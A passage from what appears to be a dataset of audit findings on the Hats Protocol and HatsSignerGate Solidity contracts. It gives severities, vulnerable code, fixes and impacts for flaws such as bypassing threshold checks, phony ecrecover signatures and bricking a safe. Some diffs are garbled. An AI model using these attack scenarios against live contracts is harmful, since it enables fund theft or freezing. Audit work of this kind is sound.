> max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.чThere should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.чSigners can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.ч```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n -HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCountчhighчThe `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\nчThe `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\nчAs mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.ч```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n -Signers can bypass checks and change threshold within a transactionчhighчThe `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.чSave the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.чSigners can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.ч```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n -Hats can be overwrittenчmediumчChild hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. This attack can be carried out by any hat wearer on their child tree, mutating their properties.чCheck if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, \"Admin not created\")\\n```\\nчч```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n -targetThreshold can be set below minThreshold, violating important invariantчmediumчThere are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all tranasctions to fail.чPerform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\nчSettings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.ч```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n -Swap Signer fails if final owner is invalid due to off by one error in loopчmediumчNew users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.чPerform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\nчWhen only the final owner is invalid, new users will not be able to claim their role as signer, even through they should.ч```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n -If a hat is owned by address(0), phony signatures will be accepted by the safeчmediumчIf a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. However, the result would be a free signer on the multisig, which would have dramatic consequences.чThe easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.чIf a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.ч```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n -If signer gate is deployed to safe with more than 5 existing modules, safe will be brickedчmediumч`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.чThe `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != moduleWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\nчIf a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.ч```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n -[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`чmediumч`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nIf first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Lets imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. (4) In this case, while the number of `validSingerCount` increased, the `_removeSigner` reduces one.чCheck if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\nчThis can make the `signerCount` and safe `threshold` to update incorrectly which can cause further problems, such as incorrect number of signatures needed.ч```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n -The Hats contract needs to override the ERC1155.balanceOfBatch functionчmediumчThe Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, \"LENGTH_MISMATCH\");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\nчConsider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.чThis will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projectsч```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n -Unbound recursive function call can use unlimited gas and break hats operationчmediumчsome of the functions in the Hats and HatsIdUtilities contracts has recursive logics without limiting the number of iteration, this can cause unlimited gas usage if hat trees has huge depth and it won't be possible to call the contracts functions. functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see this function calls itself recursively to check that if user is wearer of the one of the upper link hats of the hat or not. if the chain(depth) of the hats in the tree become very long then this function would revert because of the gas usage and the gas usage would be high enough so it won't be possible to call this function in a transaction. functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` has similar issues and the gas usage is depend on the tree depth. the issue can happen suddenly for hats if the top level topHat decide to add link, for example:\\nHat1 is linked to chain of the hats that has 1000 \"root hat\" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to chain of the hats that has 1000 \"root hat\" and the topHat (tippy hat) is TIPHat2.\\nadmin of the TIPHat1 decides to link it to the Hat2 and all and after performing that the total depth of the tree would increase to 2000 and transactions would cost double time gas.чcode should check and make sure that hat levels has a maximum level and doesn't allow actions when this level breaches. (keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold)чit won't be possible to perform actions for those hats and funds can be lost because of it.ч```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n -Owners can be swapped even though they still wear their signer hatsчmediumч`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n // rest of code\\n```\\nчPerform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.чbypass restrictions and perform action that should be disallowed.ч```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n // rest of code\\n```\\n -Safe can be bricked because threshold is updated with validSignerCount instead of newThresholdчhighчThe safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe 